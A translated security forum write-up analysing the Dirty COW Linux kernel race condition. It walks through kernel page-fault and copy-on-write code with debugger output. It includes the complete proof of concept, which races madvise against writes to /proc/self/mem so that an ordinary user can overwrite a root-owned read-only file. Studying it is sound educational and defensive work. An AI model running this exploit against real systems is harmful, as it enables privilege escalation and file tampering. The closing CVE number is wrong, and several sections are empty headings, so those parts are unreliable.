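Kanxue Forum author ID: amzilun
Overview
Environment
Background knowledge
The mmap function:
The prototype of mmap is void *mmap(void *addr /* mapping address; pass NULL and the kernel chooses where to map */, size_t length /* size of the mapping */, int prot /* protection of the mapping */, int flags /* flag bits */, int fd /* file descriptor */, off_t offset /* offset into the mapped file */). The two flags values that matter here are: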
MAP_SHARED
Share this mapping. Updates to the mapping are visible to other processes that map this file, and are carried through to the underlying file. (To precisely control when updates are carried through to the underlying file requires the use of msync(2).)
MAP_PRIVATE
Create a private copy-on-write mapping. Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file. It is unspecified whether changes made to the file after the mmap() call are visible in the mapped region.
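The MAP_PRIVATE behaviour quoted above can be checked with a small sketch. It assumes a Linux system with a writable /tmp; the function name and the temp-file template are made up for this illustration. Unlike the POC later in the article, the mapping here is created with PROT_WRITE so that an ordinary store can trigger copy-on-write.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Returns 1 if a store through a MAP_PRIVATE mapping left the file
 * unchanged, 0 if the file changed, -1 on a setup failure.
 * The name and the temp-file template are arbitrary choices for this sketch.
 */
int private_write_leaves_file_intact(void)
{
    char path[] = "/tmp/cow_demo_XXXXXX";
    char readback[5];
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    unlink(path);                       /* the file vanishes once fd is closed */
    if (write(fd, "hello", 5) != 5) {
        close(fd);
        return -1;
    }

    char *map = mmap(NULL, 5, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map != MAP_FAILED) {
        map[0] = 'J';                   /* store goes to a private copy */
        assert(map[0] == 'J');          /* the mapping sees its own write */
        if (pread(fd, readback, 5, 0) == 5)
            result = (memcmp(readback, "hello", 5) == 0);
        munmap(map, 5);
    }
    close(fd);
    return result;
}
```

On a normally behaving kernel the function should return 1: the process sees "Jello" in its mapping while the file still holds "hello".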
The madvise function (the MADV_DONTNEED advice):
Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)
Reading and writing process memory on Linux
int f = open("/proc/self/mem", O_RDWR);
lseek(f, (off_t)(uintptr_t)map, SEEK_SET); /* map is a pointer, so cast it to a file offset */
write(f, str, strlen(str));
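The three calls above can be wrapped into a self-contained helper. This is only a sketch under assumptions: it needs /proc to be mounted, it assumes a 64-bit build so that a user-space address fits in off_t, and the function name is invented for the example. It writes into an ordinary writable buffer, which is enough to show that the file offset is interpreted as a virtual address.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/*
 * Overwrites the start of buf with str by writing to /proc/self/mem at
 * offset == address of buf. Returns the number of bytes written, or -1.
 */
ssize_t write_via_proc_self_mem(char *buf, size_t buf_len, const char *str)
{
    size_t len = strlen(str);
    ssize_t n = -1;

    assert(len <= buf_len);             /* never write past the buffer */
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return -1;
    if (lseek(fd, (off_t)(uintptr_t)buf, SEEK_SET) != (off_t)-1)
        n = write(fd, str, len);
    close(fd);
    return n;
}
```

Calling it with a 16-byte buffer holding "hello" and the string "hacku" should return 5 and leave "hacku" in the buffer.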
Four-level page table mapping on 64-bit Linux (compared with Windows x64)
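As a rough illustration of the four-level scheme on x86-64 with 4 KiB pages, a 48-bit virtual address splits into four 9-bit table indexes plus a 12-bit page offset. Linux calls the levels PGD, PUD, PMD and PTE; Windows x64 uses the same split under different names. The struct and function below are hypothetical helpers, not kernel code.

```c
#include <assert.h>
#include <stdint.h>

/* Index into each table level, plus the byte offset inside the page. */
struct pt_index {
    unsigned pgd, pud, pmd, pte, offset;
};

/* Splits an x86-64 virtual address using the 9-9-9-9-12 layout. */
struct pt_index split_vaddr(uint64_t vaddr)
{
    struct pt_index ix;

    ix.offset = (unsigned)(vaddr & 0xfff);          /* bits 0..11  */
    ix.pte    = (unsigned)((vaddr >> 12) & 0x1ff);  /* bits 12..20 */
    ix.pmd    = (unsigned)((vaddr >> 21) & 0x1ff);  /* bits 21..29 */
    ix.pud    = (unsigned)((vaddr >> 30) & 0x1ff);  /* bits 30..38 */
    ix.pgd    = (unsigned)((vaddr >> 39) & 0x1ff);  /* bits 39..47 */
    assert(ix.pgd < 512 && ix.pud < 512 && ix.pmd < 512 && ix.pte < 512);
    return ix;
}
```

For the mmap address 0x7ff31f772000 printed later in the article, this gives pgd 0xff, pud 0x1cc, pmd 0xfb, pte 0x172 and offset 0.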
The proc file system
static const struct file_operations proc_mem_operations = {
    .llseek  = mem_lseek,
    .read    = mem_read,
    .write   = mem_write,
    .open    = mem_open,
    .release = mem_release,
};
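The video gives a simple explanation: at the moment process B is forked from process A, the two processes share the same physical pages.
Analyzing and running the POC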
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

void *map;
int f;
struct stat st;
char *name;

/* Thread 1: keep telling the kernel that the mapped page is not needed. */
void *madviseThread(void *arg) {
    (void)arg;
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n", c);
    return NULL;
}

/* Thread 2: keep writing the new content to the mapping via /proc/self/mem. */
void *procselfmemThread(void *arg) {
    char *str = (char *)arg;
    int f = open("/proc/self/mem", O_RDWR);
    int i, c = 0;
    for (i = 0; i < 100000000; i++) {
        lseek(f, (off_t)(uintptr_t)map, SEEK_SET);
        c += write(f, str, strlen(str));
    }
    printf("procselfmem %d\n", c);
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 3)
        return 1;
    pthread_t pth1, pth2;
    f = open(argv[1], O_RDONLY);
    fstat(f, &st);
    name = argv[1];
    /* Read-only, private mapping of the target file. */
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %lx\n", (unsigned long)map);
    pthread_create(&pth1, NULL, madviseThread, argv[1]);
    pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;
}
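2. Create an ordinary user named test.
3. Switch to root and, as root, create a file named foo.
4. Write the string hello into foo and set its mode to 0404.
5. Switch back to the ordinary user test. Because foo is owned by root and its mode is 0404, test can read the file but cannot modify it.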
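Steps 3 and 4 would normally be done from a root shell. For readers who prefer to script the setup, the file creation can also be sketched in C. The helper name is hypothetical, and the sketch only creates the file and sets mode 0404; creating the user and switching accounts is left to the shell.

```c
#include <assert.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Creates (or truncates) path, writes content into it and sets the mode
 * to 0404 (owner read, others read). Returns 0 on success, -1 on error.
 */
int make_readonly_target(const char *path, const char *content)
{
    assert(path != NULL && content != NULL);

    size_t len = strlen(content);
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;

    int ok = write(fd, content, len) == (ssize_t)len
             && fchmod(fd, 0404) == 0;
    close(fd);
    return ok ? 0 : -1;
}
```

Run as root with arguments such as "foo" and "hello", this leaves a file that the user test can open with O_RDONLY (as the POC does) but not for writing.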
Vulnerability analysis
#include <fcntl.h>
#include <stdint.h>   /* uintptr_t; replaces the hand-written typedefs */
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

void *map;
int f;
struct stat st;
char *name;

/* A single write through /proc/self/mem, with no racing thread. */
void worker_write(void *arg)
{
    char *str = (char *)arg;
    int f = open("/proc/self/mem", O_RDWR);
    int c;
    lseek(f, (off_t)(uintptr_t)map, SEEK_SET);
    c = write(f, str, strlen(str));   /* report how many bytes were written */
    printf("procselfmem %d\n\n", c);
}

int main(int argc, char *argv[])
{
    if (argc < 3)
    {
        (void)fprintf(stderr, "%s\n", "usage: dirty cow test target_file new_content");
        return 1;
    }
    f = open(argv[1], O_RDONLY);
    fstat(f, &st);
    name = argv[1];
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
    printf("mmap %#lx\n", (unsigned long)map);
    getchar();   /* wait for Enter before the write is issued */
    worker_write(argv[2]);
    return 0;
}
Call chain
handle_pte_fault
__handle_mm_fault
handle_mm_fault
faultin_page
__get_user_pages
__get_user_pages_locked
get_user_pages_remote
__access_remote_vm
access_remote_vm
mem_rw
mem_write
__vfs_write
vfs_write
SYSC_write
SyS_write
entry_SYSCALL_64
__access_remote_vm
if (pages)
flags |= FOLL_GET;
if (write) /* when writing to /proc/self/mem, write is 1; it comes from the last argument of __access_remote_vm */
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;
pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);
Once the flags are set, execution enters ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages, vmas, locked); (gup.c). Next we step into __get_user_pages to see how COW actually runs.
The three "loops" of a normal COW run
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,struct vm_area_struct **vmas, int *nonblocking)
{
...
retry:
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask);
if (!page) {
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;
...
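Before walking through each call, the retry loop above can be pictured with a toy user-space model. It is a deliberately simplified sketch that follows this article's description of the three loops; it is not kernel code, every identifier in it is hypothetical, and the real fault paths differ in detail. The madvise_races parameter models the POC's madviseThread clearing the page-table entry right after FOLL_WRITE has been dropped.

```c
#include <assert.h>

/* Which page the toy PTE points at; PAGE_NONE means "not present". */
enum page_kind { PAGE_NONE, PAGE_COW_COPY, PAGE_FILE_CACHE };

struct toy_pte {
    enum page_kind page;
    int writable;
};

#define TOY_FOLL_WRITE 0x1u

/* Models follow_page_mask(): PAGE_NONE tells the caller to fault. */
static enum page_kind toy_follow_page(const struct toy_pte *pte, unsigned flags)
{
    if (pte->page == PAGE_NONE)
        return PAGE_NONE;
    if ((flags & TOY_FOLL_WRITE) && !pte->writable)
        return PAGE_NONE;
    return pte->page;
}

/* Models faultin_page() on a read-only MAP_PRIVATE file mapping. */
static void toy_faultin_page(struct toy_pte *pte, unsigned *flags)
{
    if (pte->page == PAGE_NONE) {
        pte->page = PAGE_FILE_CACHE;    /* map the file's page, read-only */
        pte->writable = 0;
    } else if ((*flags & TOY_FOLL_WRITE) && !pte->writable) {
        pte->page = PAGE_COW_COPY;      /* copy-on-write */
        *flags &= ~TOY_FOLL_WRITE;      /* VMA is not writable: drop the flag */
    }
}

/* Returns the page that the write would finally land on. */
enum page_kind toy_get_user_page(int madvise_races)
{
    struct toy_pte pte = { PAGE_NONE, 0 };
    unsigned flags = TOY_FOLL_WRITE;
    int raced = 0;

    for (int loops = 0; ; loops++) {
        assert(loops < 8);              /* the model always ends quickly */
        enum page_kind page = toy_follow_page(&pte, flags);
        if (page != PAGE_NONE)
            return page;
        toy_faultin_page(&pte, &flags);
        if (madvise_races && !raced && !(flags & TOY_FOLL_WRITE)) {
            pte.page = PAGE_NONE;       /* MADV_DONTNEED drops the COW copy */
            raced = 1;
        }
    }
}
```

Without the race the third lookup returns the private copy, so the file is untouched. With the race, the lookup no longer carries the write flag, a plain read fault maps the file's own page, and the write lands on it.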
First call to follow_page_mask
(gdb) p page
$1 = (struct page *) 0x0 <irq_stack_union>
test@syzkaller:/home/POC$ ./second foo hacku
mmap 7ff31f772000
static struct page * follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
...
ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
pte = *ptep;
if (!pte_present(pte)) {
swp_entry_t entry;
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page;
if (pte_none(pte))
goto no_page;
...
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
#define pte_offset_map_lock(mm, pmd, address, ptlp)	\
({							\
	spinlock_t *__ptl = pte_lockptr(mm, pmd);	\
	pte_t *__pte = pte_offset_map(pmd, address);	\
	*(ptlp) = __ptl;				\
	spin_lock(__ptl);				\
	__pte;						\
})
#define pte_offset_map(pmd,addr) (__pte_map(pmd) + pte_index(addr))
So in the first loop, the first call page = follow_page_mask(...) returns NULL. Back in __get_user_pages, page is NULL, so the if (!page) condition holds and the body of the if statement runs faultin_page.
(gdb) x/gx 0x7f3417146000
0x7f3417146000: Cannot access memory at address 0x7f3417146000
First call to faultin_page
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
if (*flags & FOLL_REMOTE)
fault_flags |= FAULT_FLAG_REMOTE;
if (nonblocking)
fault_flags |= FAULT_FLAG_ALLOW_RETRY;
if (*flags & FOLL_NOWAIT)
fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
if (*flags & FOLL_TRIED) {
VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
fault_flags |= FAULT_FLAG_TRIED;
}
...
if (tsk) {
if (ret & VM_FAULT_MAJOR)
tsk->maj_flt++;
else
tsk->min_flt++;
}
if (ret & VM_FAULT_RETRY) {
if (nonblocking)
*nonblocking = 0;
return -EBUSY;
}
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
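Most of the work of faultin_page happens in ret = handle_mm_fault(mm, vma, address, fault_flags). After it runs, a physical page has been mapped. The evidence: 0x7fd49db4d00 is the address returned by mmap, and inspecting the data stored there shows the ASCII bytes of the file's own content, "hello". Note that this is the first call to the function:
Summary of the first loop:
faultin_page first translates the earlier lookup state into fault_flags. If faultin_page was entered because of a memory write, it adds the write flag with fault_flags |= FAULT_FLAG_WRITE; which in effect records the reason for the page fault.
Next we go into handle_mm_fault(mm, vma, address, fault_flags) to see what it does.
A closer look at the page-fault handling function faultin_page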
int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
unsigned long address, unsigned int flags)
{
...
ret = __handle_mm_fault(mm, vma, address, flags);
...
}
static int __handle_mm_fault(struct mm_struct *mm,struct vm_area_struct *vma,unsigned long address, unsigned int flags)
{
pgd_t *pgd;
pud_t *pud;
pmd_t *pmd;
pte_t *pte;
...
pgd = pgd_offset(mm, address);
pud = pud_alloc(mm, pgd, address);
if (!pud)
return VM_FAULT_OOM;
pmd = pmd_alloc(mm, pud, address);
if (!pmd)
return VM_FAULT_OOM;
if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
int ret = create_huge_pmd(mm, vma, address, pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
pmd_t orig_pmd = *pmd;
int ret;
barrier();
if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
unsigned int dirty = flags & FAULT_FLAG_WRITE;
if (pmd_protnone(orig_pmd))
return do_huge_pmd_numa_page(mm, vma, address,
orig_pmd, pmd);
if (dirty && !pmd_write(orig_pmd)) {
ret = wp_huge_pmd(mm, vma, address, pmd,
orig_pmd, flags);
if (!(ret & VM_FAULT_FALLBACK))
return ret;
} else {
huge_pmd_set_accessed(mm, vma, address, pmd,
orig_pmd, dirty);
return 0;
}
}
}
if (unlikely(pte_alloc(mm, pmd, address)))
return VM_FAULT_OOM;
if (unlikely(pmd_trans_unstable(pmd) || pmd_devmap(*pmd)))
return 0;
pte = pte_offset_map(pmd, address);
return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}
...
barrier();
if (!pte_present(entry)) {
if (pte_none(entry)) {
if (vma_is_anonymous(vma))
return do_anonymous_page(mm, vma, address,
pte, pmd, flags);
else
return do_fault(mm, vma, address, pte, pmd,
flags, entry);
}
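// If the page behind the pte is not in memory and the pte is not zero, the page lives in swap space, that is, on disk.
// In that case the page fault is handled by do_swap_page(), which brings the page back in.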
return do_swap_page(mm, vma, address,
pte, pmd, flags, entry);
}
...
if (pte_protnone(entry))
return do_numa_page(mm, vma, address, entry, pte, pmd);
ptl = pte_lockptr(mm, pmd);
spin_lock(ptl);
if (unlikely(!pte_same(*pte, entry)))
goto unlock;
if (flags & FAULT_FLAG_WRITE) { // the fault was triggered by a write access
if (!pte_write(entry)) // check whether the page is writable; if not, do_wp_page performs the copy-on-write
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry); // copy-on-write is required here
entry = pte_mkdirty(entry);
}
entry = pte_mkyoung(entry);
if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
update_mmu_cache(vma, address, pte);
} else {
if (flags & FAULT_FLAG_WRITE)
flush_tlb_fix_spurious_fault(vma, address);
}
unlock:
pte_unmap_unlock(pte, ptl);
return 0;
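The branching in the handle_pte_fault excerpt above can be condensed into a small decision function. This is a user-space sketch for illustration only: the struct and function names are hypothetical, the NUMA branch and all locking are left out, and the returned strings merely name the kernel handler that the excerpt would call.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical summary of the PTE and VMA state; not a kernel structure. */
struct toy_fault {
    bool pte_present;    /* pte_present(entry) */
    bool pte_none;       /* pte_none(entry) */
    bool vma_anonymous;  /* vma_is_anonymous(vma) */
    bool write_fault;    /* flags & FAULT_FLAG_WRITE */
    bool pte_writable;   /* pte_write(entry) */
};

/* Names the handler that the excerpt would dispatch to. */
const char *toy_dispatch(const struct toy_fault *f)
{
    assert(f != NULL);
    if (!f->pte_present) {
        if (f->pte_none)
            return f->vma_anonymous ? "do_anonymous_page" : "do_fault";
        return "do_swap_page";          /* non-zero pte, page is in swap */
    }
    if (f->write_fault && !f->pte_writable)
        return "do_wp_page";            /* copy-on-write path */
    return "update_pte_flags_only";     /* just young/dirty bookkeeping */
}
```

In this model the first loop of the walkthrough (empty pte, file-backed mapping) yields do_fault, and the second loop (page present but not writable, write fault) yields do_wp_page.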
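Second call to follow_page_mask
On the first call to follow_page_mask the virtual address had no physical page behind it yet, because memory is loaded lazily, so getting a NULL page back was expected. The first call to faultin_page has since mapped a physical page.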
if (likely(!(flags & FOLL_MIGRATION)))
goto no_page;
...
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
if ((flags & FOLL_WRITE) && !pte_write(pte)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
if (*flags & FOLL_WRITE)
fault_flags |= FAULT_FLAG_WRITE;
if (write)
flags |= FOLL_WRITE;
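Second call to faultin_page
if (flags & FAULT_FLAG_WRITE) { // the fault was triggered by a write access
if (!pte_write(entry)) // check whether the page is writable; if not, do_wp_page performs the copy-on-write
return do_wp_page(mm, vma, address,
pte, pmd, ptl, entry); // copy-on-write is required here
entry = pte_mkdirty(entry);
do_wp_page() is the function the COW mechanism uses to handle this page fault. The code in it that deals with anonymous pages can be skipped, and the swap machinery (the caching between memory and disk) is unrelated to the vulnerability as well. Look at the following fragment of do_wp_page():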
if (reuse_swap_page(old_page, &total_mapcount)) {
if (total_mapcount == 1) {
page_move_anon_rmap(old_page, vma);
}
unlock_page(old_page);
return wp_page_reuse(mm, vma, address, page_table, ptl,
orig_pte, old_page, 0, 0);
}
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
if (pages)
flags |= FOLL_GET;
if (write) /* when writing to /proc/self/mem, write is 1; it comes from the last argument of __access_remote_vm */
flags |= FOLL_WRITE;
if (force)
flags |= FOLL_FORCE;
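Third call to follow_page_mask
Setting up a kernel debugging environment that can read and write physical pages
Root cause and reproduction of the vulnerability
Problems encountered while debugging and how they were solved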
if ((flags & FOLL_NUMA) && pmd_protnone(*pmd))
return no_page_table(vma, flags);
if (pmd_devmap(*pmd)) {
ptl = pmd_lock(mm, pmd);
page = follow_devmap_pmd(vma, address, pmd, flags);
spin_unlock(ptl);
if (page)
return page;
}
if (likely(!pmd_trans_huge(*pmd)))
Acknowledgements and references
Kanxue ID: amzilun
https://bbs.pediy.com/user-home-803510.htm
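This article was first published on the WeChat official account 看雪学院 (Kanxue Academy): linux内核提权漏洞CVE-2016-5159 (Linux kernel privilege escalation vulnerability CVE-2016-5159)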